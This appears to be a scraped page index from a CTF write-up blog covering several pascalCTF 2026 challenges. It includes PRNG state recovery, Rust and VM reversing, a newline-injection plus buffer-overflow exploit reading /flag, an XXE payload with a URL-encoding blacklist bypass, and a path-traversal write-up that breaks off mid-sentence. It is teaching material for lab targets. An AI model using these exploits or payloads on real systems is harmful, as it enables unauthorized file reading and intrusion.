LShR(y, 1) ^ If((y \u0026amp; 1) == 1, MATRIX_A, BitVecVal(0, 32))) # Epoch 2: outputs 1248+ for i in range(2 * N, len(observations)): idx = i - 2 * N tempered = twisted2[idx] tempered = tempered ^ LShR(tempered, 11) tempered = tempered ^ ((tempered \u0026lt;\u0026lt; 7) \u0026amp; 0x9D2C5680) tempered = tempered ^ ((tempered \u0026lt;\u0026lt; 15) \u0026amp; 0xEFC60000) tempered = tempered ^ LShR(tempered, 18) s.add(Extract(19, 0, tempered) == observations[i]) s.check() return [s.model()[state[i]].as_long() for i in range(N)] io = remote(\u0026#34;wordy.ctf.pascalctf.it\u0026#34;, 5005) # io = process([\u0026#39;python3\u0026#39;, \u0026#39;service.py\u0026#39;], env={\u0026#34;FLAG\u0026#34;: \u0026#34;test{flag}\u0026#34;}) io.recvuntil(b\u0026#34;READY\u0026#34;) observations = [] for i in range(1260): io.sendline(b\u0026#34;NEW\u0026#34;) io.recvuntil(b\u0026#34;ROUND STARTED\u0026#34;) secret = solve_wordle(io) observations.append(word_to_index(secret)) state = recover_state(observations) rng = MT19937(state, 0) for _ in range(len(observations)): rng.next_u32() for _ in range(5): pred = rng.next_u32() \u0026amp; 0xFFFFF io.sendline(f\u0026#34;FINAL {index_to_word(pred)}\u0026#34;.encode()) print(io.recvline().decode()) io.interactive() Flag # pascalCTF{Y0ur_l1k3_a_3ncycl0p3d14_0f_r4nd0m_w0rds!} ","date":"1 February 2026","externalUrl":null,"permalink":"/writeups/ctfs/pascal-26/wordy/","section":"CTFs","summary":"Recovering MT19937 state from partial outputs using Z3 SAT solving.","title":"Wordy","type":"ctfs"},{"content":"","date":"1 February 2026","externalUrl":null,"permalink":"/writeups/tags/z3/","section":"Tags","summary":"","title":"Z3","type":"tags"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/blacklist-bypass/","section":"Tags","summary":"","title":"Blacklist-Bypass","type":"tags"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/buffer-overflow/","section":"Tags","summary":"","title":"Buffer-Overflow","type":"tags"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/bytecode/","section":"Tags","summary":"","title":"Bytecode","type":"tags"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/command-injection/","section":"Tags","summary":"","title":"Command-Injection","type":"tags"},{"content":"A crab stole my json schema\u0026hellip;\nThe challenge is a Rust binary that reads JSON from stdin and outputs either a crab emoji (success) or a sad face (failure):\n$ echo \u0026#39;{\u0026#34;test\u0026#34;: 1}\u0026#39; | ./curly-crab Give me a JSONy flag! 😔 $ echo \u0026#39;???\u0026#39; | ./curly-crab Give me a JSONy flag! 🦀 We need to figure out what JSON structure makes the crab happy.\nWhy Rust reversing is painful # Coming from C reversing, Rust binaries have some extra headaches:\nMonomorphization: Generic functions get duplicated for each concrete type. A simple Vec\u0026lt;T\u0026gt; becomes separate code for Vec\u0026lt;i32\u0026gt;, Vec\u0026lt;String\u0026gt;, etc. The binary bloats with near-identical functions.\nAggressive inlining: Small functions get inlined everywhere. What would be a clean call instruction in C becomes a wall of duplicated code.\nStandard library bloat: Even simple operations pull in tons of library code for error handling, Result unwrapping, iterator machinery, etc. A \u0026ldquo;hello world\u0026rdquo; in Rust is 300KB+.\nName mangling on steroids: Function names become monstrosities like _ZN4core3ptr85drop_in_place$LT$alloc..vec..Vec$LT$u8$GT$$GT$17h3b2c...\nOwnership/borrowing artifacts: The decompiled code is littered with drop_in_place calls, reference counting, and move semantics that obscure the actual logic.\nThe saving grace here: Rust\u0026rsquo;s serde library generates predictable patterns for JSON deserialization.\nThe reality: what you\u0026rsquo;re actually looking at # Before showing the cleaned-up version, here\u0026rsquo;s what Rust binaries actually look like in a decompiler. This is the real main function:\nint64_t curly_crab::main::h71b58f7aacf87a44() { std::io::stdio::_print::h526c462071e58c18(\u0026amp;data_7a8b[0x91], 0x2d); std::io::stdio::stdin::h11deceff11981680(); void* var_30 = \u0026amp;std::io::stdio::stdin::INSTANCE::h067a27bca4e07de8; int32_t* rax; rax = std::io::stdio::Stdin::lock::h1079d43173269675(\u0026amp;var_30); // ... 50 more lines of Result unwrapping and panic handling ... serde_json::de::from_trait::h1f3bcad3bd3177ac(\u0026amp;var_80, \u0026amp;var_d8); if (var_80 != -0x8000000000000000) { std::io::stdio::_print::h526c462071e58c18(\u0026amp;data_7b32, 0xb); // 🦀 } else { std::io::stdio::_eprint::hbab4723ed852db00(\u0026amp;data_7b37, 0xb); // 😔 } // ... 30 more lines of cleanup ... } The useful bits are buried in noise. Here\u0026rsquo;s how to navigate it.\nPractical tips for reversing Rust/serde # 1. Use function names as landmarks # Even mangled, the names tell you what\u0026rsquo;s happening:\nserde_json::de::from_trait → JSON parsing entry point deserialize_struct → struct field parsing deserialize_bool, deserialize_string → primitive types drop_in_place, __rust_dealloc → cleanup (ignore these) 2. Field matching follows a pattern # Serde checks field length first, then compares bytes as integers:\nif (rax_3 == 6) // length == 6 { if (!((*(r15_1 + 4) ^ 0x7962) | (*r15_1 ^ 0x62617263))) // matched! } The XOR-and-OR pattern (a ^ expected1) | (b ^ expected2) equals zero only if both match.\n3. Search for concatenated field names # Serde embeds field names in error messages. Search for strings like:\n\u0026#34;I_crabbycr4bsstruct Crab with 3 elements\u0026#34; This tells you the struct has fields I_, crabby, cr4bs and is called Crab.\n4. Ignore the noise # Most of the code is:\nResult/Option checking (-0x8000000000000000 is the Err/None discriminant) Memory cleanup (__rust_dealloc, drop_in_place) Whitespace skipping (the TEST_BITQ(0x100002600, ...) pattern) Panic handling Focus on the actual comparisons and function calls.\nIdentifying serde in the binary # Signs to look for:\nString references: Search for \u0026quot;expected struct\u0026quot;, \u0026quot;missing field\u0026quot;, \u0026quot;invalid type\u0026quot;.\nFunction name fragments: Look for serde, deserialize, Visitor, SeqAccess.\nConcatenated field names: Serde error messages contain field lists like \u0026quot;I_crabbycr4bs\u0026quot;.\nSearching strings for \u0026ldquo;struct\u0026rdquo; reveals the struct names:\n\u0026#34;expected struct TopLevel\u0026#34; \u0026#34;expected struct Crab\u0026#34; \u0026#34;expected struct Crabby\u0026#34; This tells us the hierarchy. Now we need the field names.\nHow serde deserialization works # Serde is Rust\u0026rsquo;s serialization framework. When you write:\n#[derive(Deserialize)] struct Crab { I_: bool, crabby: Crabby, cr4bs: i32, } The #[derive(Deserialize)] macro generates a deserialize function that:\nExpects either { (object) or [ (tuple/array format) Reads field names as strings Matches them against expected field names Recursively deserializes nested types Returns an error if anything doesn\u0026rsquo;t match The key insight: field name matching uses integer comparisons on the raw bytes. Instead of string comparison, serde compares chunks of the field name as integers for speed.\nFinding the entry point # Starting from main, trace the calls:\ncurly_crab::main::h71b58f7aacf87a44 │ └── serde_json::de::from_trait::h1f3bcad3bd3177ac │ └── deserialize_struct::he3c85fe01abee1f1 ← top-level struct The from_trait function is just a wrapper. The real work happens in deserialize_struct.\nWhat you\u0026rsquo;re actually looking for # Here\u0026rsquo;s a snippet from the real deserialize_struct for the top-level struct. I\u0026rsquo;ve annotated the important parts:\n// Inside deserialize_struct - the actual decompiled mess // ... skip past the \u0026#39;{\u0026#39; check and 100 lines of setup ... // THIS IS THE GOLD - field length switch if (var_148 == 3) // ← field length check { // Compare bytes: (byte[2] ^ \u0026#39;F\u0026#39;) | (bytes[0:2] ^ 0x5443) if ((*(r13_1 + 2) ^ 0x46) | (*r13_1 ^ 0x5443)) goto label_2c1ab; // unknown field // Matched \u0026#34;CTF\u0026#34;! Now deserialize the value... } else if (var_148 == 4) { if (*r13_1 != 0x62617263) // ← compare as 4-byte int goto label_2c1ab; // Matched \u0026#34;crab\u0026#34;! Call nested struct deserializer _$LT$RF$mut$u20$serde_j...deserialize_struct::hb5c049ded4c5ad6a(\u0026amp;var_158, r15_1); } else if (var_148 == 6) { // Two comparisons: 4 bytes + 2 bytes if ((*(r13_1 + 4) ^ 0x6c61) | (*r13_1 ^ 0x63736170)) goto label_2c1ab; // Matched \u0026#34;pascal\u0026#34;! Deserialize string _$LT$RF$mut$u20$serde_j...deserialize_string::h4c289388cf84ac5d(\u0026amp;var_d8, r15_1); } The pattern to look for:\nLength check in an if/switch Byte comparisons using XOR: (a ^ expected) | (b ^ expected) (equals 0 if match) Call to another deserialize_* function for the value Mapping the struct hierarchy # Follow the deserialize_struct calls to find nested structs. Each one has the same pattern of length checks and hex comparisons.\nTop-level struct # From the code above:\nCTF (len=3, 0x5443 + 0x46) → integer crab (len=4, 0x62617263) → nested struct via deserialize_struct::hb5c049ded4c5ad6a pascal (len=6, 0x63736170 + 0x6c61) → string Nested \u0026ldquo;crab\u0026rdquo; struct # Following deserialize_struct::hb5c049ded4c5ad6a, same pattern:\nif (rax_3 == 2) // \u0026#34;I_\u0026#34; if (*r15_1 != 0x5f49) goto unknown; // deserialize_bool else if (rax_3 == 5) // \u0026#34;cr4bs\u0026#34; if ((*(r15_1 + 4) ^ 0x73) | (*r15_1 ^ 0x62347263)) goto unknown; // deserialize integer else if (rax_3 == 6) // \u0026#34;crabby\u0026#34; if ((*(r15_1 + 4) ^ 0x7962) | (*r15_1 ^ 0x62617263)) goto unknown; // deserialize_struct::h39718c3ed97ba090 (another nested struct!) Fields: I_ (bool), cr4bs (int), crabby (struct)\nInner \u0026ldquo;crabby\u0026rdquo; struct # Following the next deserialize_struct:\nl0v3_ (len=5, 0x7633306c + 0x5f) → array r3vv1ng_ (len=8, 0x5f676e3176763372) → integer Visual hierarchy # Top-level ├── CTF: integer ├── crab: struct │ ├── I_: boolean │ ├── crabby: struct │ │ ├── r3vv1ng_: integer │ │ └── l0v3_: array │ └── cr4bs: integer └── pascal: string Constructing valid JSON # Based on the schema:\n{ \u0026#34;CTF\u0026#34;: 1, \u0026#34;crab\u0026#34;: { \u0026#34;I_\u0026#34;: true, \u0026#34;crabby\u0026#34;: { \u0026#34;r3vv1ng_\u0026#34;: 1, \u0026#34;l0v3_\u0026#34;: [] }, \u0026#34;cr4bs\u0026#34;: 1 }, \u0026#34;pascal\u0026#34;: \u0026#34;test\u0026#34; } Testing:\n$ echo \u0026#39;{\u0026#34;CTF\u0026#34;:1,\u0026#34;crab\u0026#34;:{\u0026#34;I_\u0026#34;:true,\u0026#34;crabby\u0026#34;:{\u0026#34;r3vv1ng_\u0026#34;:1,\u0026#34;l0v3_\u0026#34;:[]},\u0026#34;cr4bs\u0026#34;:1},\u0026#34;pascal\u0026#34;:\u0026#34;x\u0026#34;}\u0026#39; | ./curly-crab Give me a JSONy flag! 🦀 Extracting the flag # Some people submitted massive JSON documents that happened to work because they included the required fields somewhere. The key is understanding what\u0026rsquo;s actually being validated: just the field names and types, nothing more.\nThe field names spell out the flag: I_, l0v3_, r3vv1ng_, cr4bs.\nFlag # pascalCTF{I_l0v3_r3vv1ng_cr4bs} ","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/ctfs/pascal-26/curly-crab/","section":"CTFs","summary":"Reversing Rust serde deserialization to recover a JSON schema.","title":"Curly Crab","type":"ctfs"},{"content":"Many friends of mine hate git, so I made a git-like tool for them.\nThe flag can be found at /flag.\nssh \u0026lt;user\u0026gt;@git.ctf.pascalctf.it -p2222 The challenge provides a simplified git implementation called mygit:\n$ mygit Usage: mygit \u0026lt;command\u0026gt; [args] Commands: init Initialize repository add \u0026lt;file\u0026gt; Stage file commit -m \u0026lt;msg\u0026gt; Create commit branch [name] List/create branches checkout \u0026lt;branch\u0026gt; Switch branch status Show status log Show history The binary runs as a privileged user and can read /flag. We need to find a way to leak its contents.\nVulnerability 1: Newline injection in commit messages # The commit command writes the message directly into the commit file using sprintf:\nsprintf(buffer, \u0026#34;message %s\\n\u0026#34;, msg); No sanitization. If we include newlines in the message, we can inject arbitrary fields into the commit file format. The commit file structure looks like:\ntree \u0026lt;hash\u0026gt; parent \u0026lt;hash\u0026gt; message \u0026lt;msg\u0026gt; files \u0026lt;count\u0026gt; \u0026lt;hash\u0026gt; \u0026lt;path\u0026gt; \u0026lt;hash\u0026gt; \u0026lt;path\u0026gt; ... By injecting \\nfiles 1\\n\u0026lt;hash\u0026gt; \u0026lt;path\u0026gt;, we can add fake file entries that will be processed during checkout.\nVulnerability 2: Buffer overflow in path validation # The validate_path function checks for path traversal:\nstruct { int valid; char buffer[32]; } ctx; int validate_path(char *path) { ctx.valid = 1; if (strstr(path, \u0026#34;..\u0026#34;) != NULL) { ctx.valid = 0; } strcpy(ctx.buffer, path); // No bounds check! return ctx.valid; } The problem: strcpy has no length limit. If path is longer than 32 bytes, it overflows buffer and corrupts valid.\nMemory layout:\n┌─────────────────────────────────────────────────┬───────────┐ │ ctx.buffer (32 bytes) │ ctx.valid │ └─────────────────────────────────────────────────┴───────────┘ ↑ overflow overwrites this If we provide a path like ../../../../../../../../../../../../flag (40+ chars), the overflow writes past buffer into valid. Even though strstr sets valid = 0 (because of \u0026ldquo;..\u0026rdquo;), the subsequent strcpy overflow corrupts it back to a non-zero value, making the function return \u0026ldquo;valid\u0026rdquo;.\nPutting it together # During checkout, for each file in the commit:\nvalidate_path(file-\u0026gt;hash); // Check hash path validate_path(file-\u0026gt;path); // Check destination path content = object_read(file-\u0026gt;hash); // Read from .mygit/objects/\u0026lt;hash\u0026gt; file_write(file-\u0026gt;path, content); // Write to destination The object_read constructs the path:\nsnprintf(obj_path, 0x400, \u0026#34;.mygit/objects/%s\u0026#34;, hash); Attack plan:\nInject a fake file entry via commit message Use a hash like ../../../../../../../../../../../../flag The long path overflows validate_path, corrupting valid to bypass the \u0026ldquo;..\u0026rdquo; check object_read reads .mygit/objects/../../../../../../../../../../../../flag = /flag Content gets written to our controlled output file Exploit # # Initialize repo mygit init # Create and commit a dummy file (needed for valid repo state) echo x \u0026gt; x mygit add x mygit commit -m \u0026#34;first\u0026#34; # Create a branch to switch between mygit branch b # Create output file we can write to touch out chmod 777 out # Inject malicious commit with path traversal payload # The long path overflows validate_path\u0026#39;s buffer, corrupting the valid flag mygit commit -m $\u0026#39;p\\nfiles 1\\n../../../../../../../../../../../../flag out\u0026#39; # Trigger the checkout to read /flag and write to out mygit checkout b mygit checkout main # Read the flag cat out The commit message $'p\\nfiles 1\\n../../../../../../../../../../../../flag out' becomes:\nmessage p files 1 ../../../../../../../../../../../../flag out When we checkout main, it processes this fake file entry, reads /flag, and writes it to out.\nFlag # pascalCTF{m4ny_fr13nds_0f_m1n3_h4t3_git_btw} ","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/ctfs/pascal-26/grande-inutile-tool/","section":"CTFs","summary":"Buffer overflow corrupts path validation flag, enabling path traversal.","title":"Grande Inutile Tool","type":"ctfs"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/json/","section":"Tags","summary":"","title":"Json","type":"tags"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/nan/","section":"Tags","summary":"","title":"NaN","type":"tags"},{"content":"I\u0026rsquo;ve recently developed a XML to PDF utility, I\u0026rsquo;ll probably add payments to it soon!\nThe challenge is a Flask web app that converts XML files into PDFs. The .pasx extension is just a made-up format for this challenge (probably \u0026ldquo;Pascal XML\u0026rdquo; or similar), but it\u0026rsquo;s plain XML underneath.\nWhat is XXE? # XXE (XML External Entity) injection is a vulnerability in XML parsers. To understand it, we need to know about XML entities.\nEntities in XML # XML has a feature called \u0026ldquo;entities\u0026rdquo;, which are like variables. You define them in a DOCTYPE declaration and reference them with \u0026amp;name;:\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE note [ \u0026lt;!ENTITY greeting \u0026#34;Hello, World!\u0026#34;\u0026gt; ]\u0026gt; \u0026lt;note\u0026gt; \u0026lt;message\u0026gt;\u0026amp;greeting;\u0026lt;/message\u0026gt; \u0026lt;/note\u0026gt; When parsed, \u0026amp;greeting; gets replaced with \u0026ldquo;Hello, World!\u0026rdquo;. This is useful for reusing text or defining special characters.\nExternal entities # The dangerous part is external entities. Instead of defining inline content, you can tell the parser to fetch content from a URI:\n\u0026lt;!ENTITY xxe SYSTEM \u0026#34;file:///etc/passwd\u0026#34;\u0026gt; The SYSTEM keyword means \u0026ldquo;fetch this from an external source\u0026rdquo;. The parser will read /etc/passwd and substitute its contents wherever \u0026amp;xxe; appears. This is XXE.\nWhy does this feature exist? # External entities were designed for legitimate use cases like:\nSplitting large documents across multiple files Including shared content (like a common header) in multiple documents Referencing DTD (Document Type Definition) files for validation The feature predates modern security concerns. Most XML parsers have it enabled by default for backwards compatibility, which is why XXE is such a common vulnerability.\nWhat can you do with XXE? # Read local files: SYSTEM \u0026quot;file:///etc/passwd\u0026quot; SSRF (Server-Side Request Forgery): SYSTEM \u0026quot;http://internal-server/\u0026quot; Denial of service: The \u0026ldquo;billion laughs\u0026rdquo; attack uses nested entities to consume memory Port scanning: Timing differences reveal open ports In some cases, remote code execution: Via expect:// or other protocol handlers The vulnerability # The XML parser is configured with external entity resolution enabled:\nparser = etree.XMLParser(encoding=\u0026#39;utf-8\u0026#39;, no_network=False, resolve_entities=True, recover=True) root = etree.fromstring(xml_content, parser=parser) The resolve_entities=True flag tells lxml to actually fetch and substitute external entities. Combined with no_network=False (allowing network requests), this parser is fully vulnerable to XXE.\nIn a secure configuration, you\u0026rsquo;d use resolve_entities=False or at minimum no_network=True. Many modern XML libraries disable external entities by default, but lxml wraps libxml2 which has them enabled by default for compatibility with legacy XML documents.\nWith this configuration, we can define external entities that read files from the filesystem:\n\u0026lt;!DOCTYPE book [ \u0026lt;!ENTITY xxe SYSTEM \u0026#34;/etc/passwd\u0026#34;\u0026gt; ]\u0026gt; When the parser encounters \u0026amp;xxe;, it will fetch the contents of /etc/passwd and substitute them inline.\nThe blacklist # Before parsing, the app runs a sanitization check:\ndef sanitize(xml_content): content_str = xml_content.decode(\u0026#39;utf-8\u0026#39;) if \u0026#34;\u0026amp;#\u0026#34; in content_str: return False blacklist = [ \u0026#34;flag\u0026#34;, \u0026#34;etc\u0026#34;, \u0026#34;sh\u0026#34;, \u0026#34;bash\u0026#34;, \u0026#34;proc\u0026#34;, \u0026#34;pascal\u0026#34;, \u0026#34;tmp\u0026#34;, \u0026#34;env\u0026#34;, \u0026#34;bash\u0026#34;, \u0026#34;exec\u0026#34;, \u0026#34;file\u0026#34;, \u0026#34;pascalctf is not fun\u0026#34;, ] if any(a in content_str.lower() for a in blacklist): return False return True This blocks obvious paths like /app/flag.txt or /etc/passwd by checking if the raw XML string contains blacklisted words. It also blocks \u0026amp;# to prevent XML character entity encoding like \u0026amp;#102; for f.\nThe bypass # The blacklist operates on the raw XML string, but the XML parser processes the content differently. Specifically, libxml2 (used by lxml) decodes URL-encoded characters in SYSTEM entity paths.\nSo we can URL-encode the blocked word:\nOriginal URL-encoded flag %66%6C%61%67 The Python blacklist sees %66%6C%61%67 and doesn\u0026rsquo;t match \u0026ldquo;flag\u0026rdquo;. But when libxml2 resolves the entity path /app/%66%6C%61%67.txt, it decodes the percent-encoding and reads /app/flag.txt.\nExploit # \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;utf-8\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE book [ \u0026lt;!ENTITY xxe SYSTEM \u0026#34;/app/%66%6C%61%67.txt\u0026#34;\u0026gt; ]\u0026gt; \u0026lt;book\u0026gt; \u0026lt;title\u0026gt;\u0026amp;xxe;\u0026lt;/title\u0026gt; \u0026lt;author\u0026gt;x\u0026lt;/author\u0026gt; \u0026lt;year\u0026gt;2024\u0026lt;/year\u0026gt; \u0026lt;isbn\u0026gt;000\u0026lt;/isbn\u0026gt; \u0026lt;chapters\u0026gt; \u0026lt;chapter number=\u0026#34;1\u0026#34;\u0026gt; \u0026lt;title\u0026gt;x\u0026lt;/title\u0026gt; \u0026lt;content\u0026gt;x\u0026lt;/content\u0026gt; \u0026lt;/chapter\u0026gt; \u0026lt;/chapters\u0026gt; \u0026lt;/book\u0026gt; Upload this as a .pasx file, and the generated PDF will contain the flag as the book title.\nFlag # pascalCTF{xml_t0_pdf_1s_th3_n3xt_b1g_th1ng} ","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/ctfs/pascal-26/pdfile/","section":"CTFs","summary":"XXE injection with blacklist bypass via URL encoding.","title":"Pdfile","type":"ctfs"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/topics/rev/","section":"Topics","summary":"Reverse engineering challenges and program analysis.","title":"Rev","type":"topics"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/rust/","section":"Tags","summary":"","title":"Rust","type":"tags"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/serde/","section":"Tags","summary":"","title":"Serde","type":"tags"},{"content":"A stranger once built a VM and hid the Forbidden Key, can you uncover it?\nWe get a VM binary and a bytecode file code.pascal. Running it asks for input and either accepts or rejects.\nFinding the VM loop # Opening the binary reveals a simple fetch-decode-execute loop:\nwhile (1) { opcode = bytecode[pc]; pc++; switch (opcode) { case 0: // HALT return; case 1: // ADD addr = *(uint32_t*)\u0026amp;bytecode[pc]; imm = bytecode[pc + 4]; pc += 5; mem[addr] = (mem[addr] + imm) \u0026amp; 0xFF; break; case 2: // SUB addr = *(uint32_t*)\u0026amp;bytecode[pc]; imm = bytecode[pc + 4]; pc += 5; mem[addr] = (mem[addr] - imm) \u0026amp; 0xFF; break; case 3: // MOD addr = *(uint32_t*)\u0026amp;bytecode[pc]; imm = bytecode[pc + 4]; pc += 5; mem[addr] = mem[addr] % imm; break; case 4: // MOV addr = *(uint32_t*)\u0026amp;bytecode[pc]; imm = bytecode[pc + 4]; pc += 5; mem[addr] = imm; break; case 5: // IN (read char) addr = *(uint32_t*)\u0026amp;bytecode[pc]; pc += 4; mem[addr] = getchar(); break; case 6: // JZ (jump if zero) addr = *(uint32_t*)\u0026amp;bytecode[pc]; offset = (int8_t)bytecode[pc + 4]; // signed! pc += 5; if (mem[addr] == 0) pc += offset; break; } } Opcode Mnemonic Encoding Description 0x00 HALT 00 Stop execution 0x01 ADD 01 \u0026lt;addr:4\u0026gt; \u0026lt;imm:1\u0026gt; mem[addr] += imm 0x02 SUB 02 \u0026lt;addr:4\u0026gt; \u0026lt;imm:1\u0026gt; mem[addr] -= imm 0x03 MOD 03 \u0026lt;addr:4\u0026gt; \u0026lt;imm:1\u0026gt; mem[addr] %= imm 0x04 MOV 04 \u0026lt;addr:4\u0026gt; \u0026lt;imm:1\u0026gt; mem[addr] = imm 0x05 IN 05 \u0026lt;addr:4\u0026gt; mem[addr] = getchar() 0x06 JZ 06 \u0026lt;addr:4\u0026gt; \u0026lt;off:1\u0026gt; Jump if mem[addr] == 0 Writing a disassembler # import struct def disassemble(bytecode): pc = 0 while pc \u0026lt; len(bytecode): opcode = bytecode[pc] if opcode == 0: print(f\u0026#34;{pc:04x}: HALT\u0026#34;) break elif opcode in [1, 2, 3, 4]: names = {1: \u0026#34;ADD\u0026#34;, 2: \u0026#34;SUB\u0026#34;, 3: \u0026#34;MOD\u0026#34;, 4: \u0026#34;MOV\u0026#34;} addr = struct.unpack(\u0026#39;\u0026lt;I\u0026#39;, bytecode[pc+1:pc+5])[0] imm = bytecode[pc+5] print(f\u0026#34;{pc:04x}: {names[opcode]} mem[{addr}], {imm}\u0026#34;) pc += 6 elif opcode == 5: addr = struct.unpack(\u0026#39;\u0026lt;I\u0026#39;, bytecode[pc+1:pc+5])[0] print(f\u0026#34;{pc:04x}: IN mem[{addr}]\u0026#34;) pc += 5 elif opcode == 6: addr = struct.unpack(\u0026#39;\u0026lt;I\u0026#39;, bytecode[pc+1:pc+5])[0] offset = bytecode[pc+5] if offset \u0026gt; 127: offset -= 256 # sign extend target = pc + 6 + offset print(f\u0026#34;{pc:04x}: JZ mem[{addr}], {offset:+d} -\u0026gt; {target:04x}\u0026#34;) pc += 6 with open(\u0026#34;code.pascal\u0026#34;, \u0026#34;rb\u0026#34;) as f: disassemble(f.read()) Analyzing the bytecode # The disassembled output shows a repeating pattern for each input character:\n0000: IN mem[0] ; read char 0 0005: MOV mem[1], 0 ; temp = 0 000b: MOD mem[1], 2 ; temp = 0 % 2 = 0 0011: JZ mem[1], +12 ; if temp == 0, jump to ADD 0017: SUB mem[0], 0 ; (skipped) char -= 0 001d: JZ mem[1023], +6 ; unconditional jump (mem[1023] is always 0) 0023: ADD mem[0], 0 ; char += 0 0029: IN mem[1] ; read char 1 002e: MOV mem[2], 1 ; temp = 1 0034: MOD mem[2], 2 ; temp = 1 % 2 = 1 003a: JZ mem[2], +12 ; if temp == 0 (false), continue 0040: SUB mem[1], 1 ; char -= 1 0046: JZ mem[1023], +6 ; unconditional jump past ADD 004c: ADD mem[1], 1 ; (skipped) 0052: IN mem[2] ; read char 2 0057: MOV mem[3], 2 ; temp = 2 005d: MOD mem[3], 2 ; temp = 2 % 2 = 0 0063: JZ mem[3], +12 ; if temp == 0, jump to ADD 0069: SUB mem[2], 2 ; (skipped) 006f: JZ mem[1023], +6 ; unconditional jump 0075: ADD mem[2], 2 ; char += 2 ... The pattern:\nRead character into mem[i] Check if index i is odd or even via i % 2 If even: mem[i] += i If odd: mem[i] -= i The JZ mem[1023] is a clever unconditional jump. Since mem[1023] is never written, it stays 0, so the jump always triggers.\nFinding the target values # After the bytecode finishes, main compares the result:\nif (strcmp(mem, flag)) puts(\u0026#34;Execution failed. The code did not match the expected flag.\u0026#34;); else puts(\u0026#34;Congratulations! You have successfully executed the code.\u0026#34;); Where flag points to:\nchar flag[0x29] = \u0026#34;VLu\\\\8m9Xl(\u0026gt;W{_?TD[q \\x82\\x1b\\x8bP\\x80F~\\x15\\x8aW}ZPT\\x81Q\\x8c\\x0c\\x94D\u0026#34;; The target bytes are right there in the binary.\nSolving # Reverse the transformation:\ntarget = bytes([ 0x56, 0x4C, 0x75, 0x5C, 0x38, 0x6D, 0x39, 0x58, 0x6C, 0x28, 0x3E, 0x57, 0x7B, 0x5F, 0x3F, 0x54, 0x44, 0x5B, 0x71, 0x20, 0x82, 0x1B, 0x8B, 0x50, 0x80, 0x46, 0x7E, 0x15, 0x8A, 0x57, 0x7D, 0x5A, 0x50, 0x54, 0x81, 0x51, 0x8C, 0x0C, 0x94, 0x44 ]) flag = bytearray() for i, b in enumerate(target): if i % 2 == 0: flag.append((b - i) \u0026amp; 0xFF) # reverse of +i else: flag.append((b + i) \u0026amp; 0xFF) # reverse of -i print(flag.decode()) Flag # pascalCTF{VMs_4r3_d14bol1c4l_3n0ugh_d0nt_y0u_th1nk} ","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/ctfs/pascal-26/strangevm/","section":"CTFs","summary":"Reverse a simple VM to understand its character transformation.","title":"StrangeVM","type":"ctfs"},{"content":"Nel mezzo del cammin di nostra vita mi ritrovai per una selva oscura, ché la diritta via era smarrita.\nThe flag can be found here /app/flag.txt\nThe challenge presents a \u0026ldquo;Travel Playlist\u0026rdquo; website with a gallery of travel-themed songs. You can navigate between pages 1-7, each showing a different song with a YouTube link.\nNo source code was provided, so we need to figure out how the site works.\nA false lead # The URL structure shows a number: https://travel.ctf.pascalctf.it/pages/4. Normally, a number in a URL like this would make you think of IDOR (Insecure Direct Object Reference), not path traversal. But when the challenge description is practically screaming \u0026ldquo;path traversal\u0026rdquo; with the Dante quote, your brain might jump to trying LFI here first:\nhttps://travel.ctf.pascalctf.it/pages/../../../etc/passwd This doesn\u0026rsquo;t work. The /pages/4 route is handled by a framework that maps it to a function, not directly to files. The lesson: even when you\u0026rsquo;re pretty sure what vulnerability you\u0026rsquo;re looking for, don\u0026rsquo;t get tunnel vision on the first input you see. Check all the places where user input flows into the application.\nDiscovering the API # When you click around a website, your browser makes requests behind the scenes. To see what\u0026rsquo;s happening, you can use:\nBrowser DevTools (easiest)\nOpen the site in your browser Press F12 or right-click and select \u0026ldquo;Inspect\u0026rdquo; Go to the \u0026ldquo;Network\u0026rdquo; tab Click around the site and watch requests appear Look for API calls (often to /api/... endpoints) Burp Suite (more powerful)\nConfigure your browser to proxy through Burp Browse the site normally Burp captures every request for inspection and modification Using either method, we can see that when navigating to a page, the site makes a POST request:\nPOST /api/get_json Content-Type: application/json {\u0026#34;index\u0026#34;: \u0026#34;1\u0026#34;} And receives back:\n{ \u0026#34;name\u0026#34;: \u0026#34;Red Hot Chili Peppers - Road Trippin\u0026#39;\u0026#34;, \u0026#34;author\u0026#34;: \u0026#34;Red Hot Chili Peppers\u0026#34;, \u0026#34;description\u0026#34;: \u0026#34;Watch the official music video...\u0026#34;, \u0026#34;url\u0026#34;: \u0026#34;https://youtu.be/11GYvfYjyV0\u0026#34; } The index parameter controls which song data gets loaded. But how does the server use this parameter?\nWhat is path traversal? # The server is probably reading files like /app/data/1.json, /app/data/2.json, etc. If the code looks something like:\ndef get_json(): index = request.json[\u0026#39;index\u0026#39;] path = f\u0026#34;/app/data/{index}.json\u0026#34; return open(path).read() Then the index value gets inserted directly into the file path. This is dangerous because we can use .. (dot-dot) to navigate up directories.\nIn file systems, .. means \u0026ldquo;parent directory\u0026rdquo;. So:\n/app/data/1.json reads the normal file /app/data/../flag.txt goes up from data/ to /app/, then reads flag.txt This technique is called path traversal or directory traversal. It lets attackers escape the intended directory and read arbitrary files.\nThe hint # The challenge description quotes Dante\u0026rsquo;s Inferno:\nNel mezzo del cammin di nostra vita mi ritrovai per una selva oscura, ché la diritta via era smarrita.\nTranslation:\n\u0026ldquo;In the middle of the journey of our life, I found myself in a dark forest, for the straight path was lost.\u0026rdquo;\nThe key phrase is \u0026ldquo;la diritta via era smarrita\u0026rdquo;, meaning \u0026ldquo;the straight/direct path was lost.\u0026rdquo; This hints at path traversal: instead of following the intended path (/app/data/1.json), we stray off course using ../ to wander 